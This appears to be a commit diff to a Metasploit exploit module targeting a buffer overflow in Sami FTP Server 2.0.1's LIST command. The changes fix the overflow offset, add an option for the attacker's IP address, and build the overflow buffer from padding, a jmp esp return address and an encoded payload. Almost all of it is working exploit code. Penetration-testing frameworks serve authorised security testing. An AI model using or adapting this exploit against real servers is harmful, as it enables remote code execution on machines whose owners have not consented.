Uses IP address length in offset calculation

Author: dougsko

modules/exploits/windows/ftp/sami_ftpd_list.rb

@@ -17,7 +17,7 @@ def initialize(info = {})
 			'Name'			 => 'Sami FTP Server 2.0.1 LIST Command Buffer Overflow',
 			'Description'	 => %q{
 					A buffer overflow is triggered when a long LIST
-				command is sent to the server and the user views the Log tab.
+				command is sent to the server while the user is viewing the Logs tab.
 			},
 			'Platform'		 => 'win',
 			'Author'		 =>
@@ -48,18 +48,24 @@ def initialize(info = {})
 						'Windows Universal',
 						{
 							'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll
-							'Offset'   => 219,
+							'Offset'   => 225,
 						},
 					],
 				],
 			'DefaultTarget' => 0,
 			'DisclosureDate' => 'Feb 27 2013'))
+		register_options(
+			[
+				OptString.new('IPADDR', [true, 'Attacker\'s IP address'])
+			], self.class)
 	end
 
 	def exploit
 		connect_login
-
-		buf = rand_text(target['Offset'], payload_badchars)
+		sleep 1
+		
+		ip_length = datastore['IPADDR'].length - 3
+		buf = rand_text_alphanumeric(target['Offset'] - ip_length)
 		buf << [ target['Ret'] ].pack('V')
 		buf << payload.encoded